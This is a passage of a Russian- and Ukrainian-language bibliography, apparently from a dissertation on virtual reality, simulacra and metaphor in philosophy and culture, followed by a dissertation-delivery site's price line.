    51. Говорунов А.В. Человек в ситуации виртуальной реальности // Информация. Коммуникация. Общество. СПб., 2000. С.
    52. Горячковская А.Н. Виртуальность и трансценденция // Вісник Харківського національного університету імені В.Н.Каразіна. Серія: Теорія культури та філософія науки. Х.: ХНУ, 2003. - №588. ‑ С. 44-49.
    53. Горячковская А.Н. Игра как виртуальное событие: театр А.Арто // Вісник Харківського національного університету імені В.Н.Каразіна. Серія: Теорія культури та філософія науки. Х.: ХНУ, 2005. - №708. С.27-32.
    54. ГорячковскаяА.Н. Концептуальный персонаж виртуальной реальности// Вісник Харківського національного університету імені В.Н.Каразіна. Серія: Теорія культури та філософія науки. Х.: ХНУ, 2007. - №764-2. С. 10-14.
    55. Горячковская А.Н. Метафора как потенциация смыслов // Вісник Харківського національного університету імені В.Н.Каразіна. Серія: Теорія культури та філософія науки. Х.: ХНУ, 2004. - №615. С. 32-34.
    56. Горячковская А.Н. Переживание как модус виртуальности // Вісник Харківського національного університету імені В.Н.Каразіна. Серія: Теорія культури та філософія науки. Х.: ХНУ, 2004. - №644. С. 42-44.
    57. ГорячковскаяА. Человек и симулякр // POST OFFICE: Образи часу образи світу. // Вісник Харківського національного університету імені В.Н.Каразіна. Серія: Теорія культури та філософія науки. ‑ Х.: ХНУ, 2007. ‑ №776. С. 83-90.
    58. Гройс Б. "Вечное возвращение нового"// Искусство. ‑ 1989. ‑ №10. ‑ С.1-14.
    59. Гройс Б. Новое в искусстве // Искусство кино. 1992. ‑ № 3. С.
    60. Гроф С. За пределами мозга. М.: ООО «Издательство АСТ» и др., 2004. 497с.
    61. Гуманитарные исследования в Интернете. М.: Можайск-Терра, 2000. 431 с.
    62. Дашенкова Н.Н. Антропологические аспекты дигитализации // Вестник ХНУ им. В.Н.Каразина. Харьков, 2002. - №553. С.
    63. Девтеров І.В. Зміна умов розвитку людини під впливом віртуального інтерактивного середовища // Мультиверсум. Філософський альманах: зб. наук. праць. Вип. 12. К.: , 2000. С.
    64. Делез Ж. Гваттари Ф. Что такое философия? СПб.: Алетейя, 1998. 288 с.
    65. Делез Ж. Кино. М.:Изд-во «Ад Маргинем», 2004. 622 с.
    66. Делёз Ж. Логика смысла. М.: Раритет; Екатеринбург: Деловая книга, 1998. 480 с.
    67. Делез Ж. Платон и симулякр. // Интенциональность и текстуальность. Томск: Водолей, 1998. С.
    68. Делез Ж. Различие и повторение. СПб.: Петрополис, 1998. 384 с.
    69. Деррида Ж. Письмо и различие. ‑ М.: Терра,1991. ‑ 411с.
    70. Жижек С. Киберпространство, или Невыносимая замкнутость бытия.// Искусство кино. -1998. - №№1-2. СС.
    71. Жижек С. Глядя вкось (Введение в психоанализ Лакана через массовую культуру) http://www.ukma.kiev.ua/pub/MWT/Text/Zizek/zizek_1.htm
    72. Зиммель Г. Приключение. В кн.: Избранное т.2. - М.: Юристъ, 1996. 607 с.
    73. Ильин И. Постмодернизм от истоков до конца столетия. Эволюция научного мифа. М.: Интрада, 1998. 255 с.
    74. История эстетики. Памятники мировой эстетической мысли. В 5 т. Т.1. М.: Изд-во Акад. Худ. СССР, 1962. 682 с.
    75. Кайуа Р. Миф и человек. Человек и сакральное. - М.: , 2003. с.
    76. Камю А. Посторонний. С/с в 5тт. ‑ т.1. ‑ Харьков: Фолио, 1998. 399 с.
    77. Каріна О.Н. Смислові обрії поняття „віртуальний”.// Вестник ХНУ им. В.Н.Каразина. Харьков, 2002. - №553. С.
    78. Кассирер Э. Избранное. Опыт о Человеке. М.: Гардарика, 1998. 779с.
    79. Кассирер Э. Сила метафоры // Теория метафоры. М.: Прогресс, 1990. С. 33-43.
    80. КассирерЭ. Философия символических форм. Т. 1. Язык. - М.; СПб.: Университетская книга, 2002. 272 с.
    81. КассирерЭ. Философия символических форм. Т. 2. Мифологическое мышление. - М.; СПб.: Университетская книга, 2002. 280 с.
    82. Кассирер Э. Философия символических форм. Т. 3. Феноменология познания. - М.; СПб.: Университетская книга, 2002. ‑ 398 с.
    83. Кастельс М. Информационная эпоха: Экономика, общество и культура. М.: ГУ ВШЭ, 2000. 608 с.
    84. Клоссовски П. О симулякре в сообщении Жоржа Батая // Танатография Эроса: Жорж Батай и французская мысль середины ХХ века. СПб.: Мифрил, 1994. С.
    85. Козловски П. Культура постмодерна. ‑ М.: Республика, 1997. ‑ 238 с.
    86. Козловски П. Современность постмодерна // Вопросы философии. М., 1995. ‑ №10. ‑ С. 84-93.
    87. Корсунцев И.Г. Философия виртуальной реальности // Виртуальная реальность: философские и психологические проблемы. М., 1997. С.
    88. Кречмер Э. Истерия и симуляция
    89. Кузнецов М.М. Виртуальная реальность техногенный артефакт или сетевой феномен? // Виртуалистика: экзистенциальные и эпистемологические аспекты. М., 2004. С. 62-90.
    90. Кузнецов М.М. Современная западная философия и идея виртуальной реальности.// Виртуальная реальность: философские и психологические проблемы. М., 1997. С.
    91. Культурология. ХХ век. Словарь. - СПб.: Университет, 1997. 630 с.
    92. Курицын В. Русский литературный постмодернизм. М.: , 2001. с.
    93. Кучеренко В.В., Петренко В.Ф., Россохин А.В. Измененные состояния сознания: психологический анализ // Психология сознания. СПб.: Питер, 2001. 480 с.
    94. Лакан Ж. Образования бессознательного.(Семинары: Книга V (1957/1958)). М.: , - 2002. с.
    95. Лакофф Д., Джонсон М. Метафоры, которыми мы живем // Теория метафоры. М.: Прогресс, 1990. С. 387-415.
    96. Лангер С. Философия в новом ключе: Исследование символики разума, ритуала и искусства. М.: Республика, 2000. 286 с.
    97. Левашов В. Визуальный век // Искуство кино. 2000. - №11. С.
    98. Левинас Э. Диахрония и репрезентация.// Интенциональность и текстуальность. Философская мысль ХХ века. Томск: , 1998. С.
    99. Легенький Ю.Г. Віртуальна реальність: проблема культурологічної та естетичної адеквації // Актуальні проблеми історії, теорії та практики художньої культури: зб. наук. праць. вип. 3 у 2-х частинах. Ч. 1. К.: 1999. С.
    100. Леонтьева В.Н. Концепт небытия в онтологии культуротворчества (проект исследования) // Вестник ХНУ им. В.Н.Каразина. Харьков, 2004. - №644. С.
    101. Лешкевич Т.Г. Виртуалистика и феномен кланирования в контексте новой парадигмы // Философия науки: традиции и новации. М.: , 2001. С.
    102. Лиотар Ж.-Ф. Состояние постмодерна. - СПб.: Алетейя, 1998. 160 с.
    103. Литвиненко В.А. «Трансформация сознания в эпоху интернета» -www.futurerussia.ru
    104. Лосев А. Диалектика мифа.// Миф. Число. Сущность. - М.: Мысль, 1994. 919 с.
    105. Лосев А.Ф. Проблема символа и реалистическое искусство. М.: Искусство, 1976. 367 с.
    106. Лотман Ю.М. Семиосфера. СПб.: «Искусство СПБ», 2001. 704 с.
    107. МакКормак Э. Когнитивная теория метафоры. // Теория метафоры. - М.: Прогресс, 1990. С. 358-386.
    108. Мамардашвили М.К. Беседы о мышлении // Мысль изреченная - М.: , 1991. С. 13-50.
    109. Мамардашвили М.К. Время и пространство театральности // Театр. 1989. - №4. С.
    110. Мамардашвили М.К. Метафизика Арто // Мамардашвили М.К. Как я понимаю философию. М.: Прогресс, 1992. С.
    111. Мамардашвили М.К. Пятигорский А.М. Символ и сознание: Метафизические рассуждения о символике, сознании и языке. М.: Шк. «Языки рус. культуры», 1999. 216 с.
    112. Мамчур Е.А. Концепция виртуальных миров и мир научного знания.// Концепция виртуальных миров и научное познание. СПб.: , 2000. с.
    113. Маньковская Н.Б. Эстетика постмодернизма. М.: Алетейя, 2000. 347 с.
    114. Марков Б.В. От опыта сознания к опыту бытия.// Герменевтика и деконструкция. СПб.: , 1999. С.
    115. Марков Б.В. Проблема Человека в епоху масс-медиа.// Перспективы человека в глобализирующемся мире. СПб.: , 2003. С.
    116. Маслов А. Новые рубежи человеческой природы. М.: , 1999.
    117. Маслов О.Р. Пронина Е.С. Психика и реальность: типология виртуальности // Виртуальная реальность в психологии и искусственном интеллекте. М.: , 1998.
    118. Микешина Л.А. Опенков М.Ю. Новые образы познания и реальности. М.:, 1997.
    119. Михеев А. Вокруг, около, вместо // Иностранная литература. 1995. ‑ №5. ‑ С.31-35.
    120. Моделирование сложных систем и виртуальная реальность.// Вопросы кибернетики. М., 1995. - №181.
    121. Налимов В.В. В поисках иных смыслов. М.: Прогресс, 1993. 280с.
    122. Налимов В.В. Дрогалина Ж.А. Вероятностная модель бессознательного. Бессознательное как проявление семантической вселенной.// Психологический журнал. 1984. Т. 5. - №6. С.
    123. Налимов В.В. О возможности метафорического использования математических представлений в психологии.// Психологический журнал. 1981. Т. 2. - №3. С.
    124. Налимов В.В. Спонтанность сознания: Вероятностная теория смыслов и смысловая архитектоника личности. М.: Изд-во «Прометей» МГПИ им. Ленина , 1989. 287 с.
    125. Николай Кузанский. Соч.: В 2-х томах. М.: Мысль, 1980. 471с.
    126. Ницше Ф. Воля к власти. Опыт переоценки всех ценностей.- М.: REFL-book, 1994. с.
    127. Ницше Ф. Соч.: В2-х томах. М.,1996.
    128. Новейший философский словарь: 2-е изд., переработ. и дополн. Мн: Интерпрессервис; Книжный Дом, 2001. 1280 с.
    129. Новиков В.И. В поисках определения // Постмодернизм и культура: материалы "круглого стола" С.8
    130. Носов Н.А. Виртуальная психология. М.: Аграф, 2000. 430 с.
    131. Носов Н.А. Виртуальная реальность.// Вопросы философии. 1999. - №10. С.
    132. Носов Н.А. Виртуальный человек: Очерки по виртуальной психологии детства. М.: Магистр, 1997. 192 с.
    133. Носов Н.А. Три философии // Виртуалистика: экзистенциальные и эпистемологические аспекты. М.: Прогресс-Традиция, 2004. 342-361 с.
    134. Носов С. Литература и игра // Новый мир. 1992. ‑ №2. ‑ С. 232-237.
    135. Нуждин Г.А. Сознание и его структуры. - http://philosophy.allru.net/perv65.zip
    136. Опенков М.Ю. Виртуальная реальность: онтико-диалогический подход // Труды лаборатории виртуалистики. Вып. 4. Виртуальные реальности. М.: , 1998. С.
    137. Ортега-и-Гассет Х. Две великие метафоры // Теория метафоры. М: Прогресс, 1990. С. 68-81.
    138. Пави П. Словарь театра. - М.: Прогресс, 1991. 480 с.
    139. Персиков Я.М. Хвост пчелы: изменение состояния сознания как изменение культурной парадигмы. СПб.: , 1996. с.
    140. Петрова Н. Виртуальная реальность как новый метод арт-терапии, или расставание с собой. - http://www.rik.ru/vculture/vrat/index.html
    141. Пирс Ч. Избранные философские произведения. М.: Логос, 2000. 412 с.
    142. Платон. Софист // Платон. Собр. соч. в 4х т-х. Т. М.: Мысль, 1990-93.
    143. Подарога В. Выражение и смысл. - М.: , - 1995. с.
    144. Покровский А.Н. Виртуальная реальность как универсум сотворенный // Материалы 7-го Международного молодежного форума «Радиоэлектроника и молодежь в ХХІ веке» 22 -24.04.2003 Харьков, 2003. С.
    145. Покровский А.Н. Техника, технология, техногенность как проблемный ряд современной антропологии.// Вестник ХНУ им. В.Н.Каразина. Харьков, 2004. - №644. С.
    146. Померанц Г. Язык абсурда. //Г.Померанц. Выход из транса. М.: Юристъ, - 1995. 575 с.
    147. Попов В.Г. Физическая реальность и язык. СПб.: Изд-во С.-Петерб. ун-та, 2004. 248 с.
    148. После времени. Французские философы постсовременности // Новый мир. 1992. ‑ №2. ‑ С.
    149. Поспелов Д.А. Где исчезают виртуальные миры?// Новости искусственного интеллекта. 2003. - №3 (электронная версия).
    150. Ребер Б. Роша Ф. Виртуальное: Апокалипсис или повторное посещение платоновской пещеры? // Концепция виртуальных миров и научное познание. СПб.: , 2000. С.
    151. Рекурсивное и дискурсивное в структуре смыслообразования. М.: Смысл, 2004. 206 с.
    152. Ретюнских Л.Т. Философия игры. Москва: Вузовская книга, 2002. 256 с.
    153. Рикер П. Живая метафора // Теория метафоры. М.: Прогресс, 1990. С. 435-455.
    154. Рикер П. Метафорический процесс как познание, воображение и ощущение // Теория метафоры. М.: Прогресс, 1990. С. 416-434.
    155. Ричардс А. Философия риторики // Теория метафоры. М.: Прогресс, 1990. С. 44-67.
    156. Родин В.А. Именование как событие: от возможных миров к виртуальной среде // Концепция виртуальных миров и научное познание. СПб.: , 2000. С.
    157. Розанов В.В. О понимании. СПб.: Наука, 1994. 539 с.
    158. Розин В.М. Визуальная культура и восприятия: Как человек видит и воспринимает мир. М., 1996.
    159. Розин В.М. Существование, реальность, виртуальная реальность// Концепция виртуальных миров и научное познание. СПб.: , 2000. С.
    160. Романовская Т.Б. Иная реальность и проблемы интерпретации // Концепция виртуальных миров и научное познание. СПб.: , 2000. С.
    161. Рорти Р. Случайность, ирония и солидарность. - М.: Русское феноменологическое общество, 1996. 282с.
    162. Руднев В. Морфология реальности // Митин журнал, 1994. = Э 51.
    163. Руднев В. Словарь культуры ХХ века. М.: Аграф, 1999. 381 с.
    164. Руднев В. Феноменология галлюцинаций // Логос. 2001. - №2. С.
    165. 
  • Стоимость доставки:
  • 70.00 грн


ПОИСК ДИССЕРТАЦИИ, АВТОРЕФЕРАТА ИЛИ СТАТЬИ


Доставка любой диссертации из России и Украины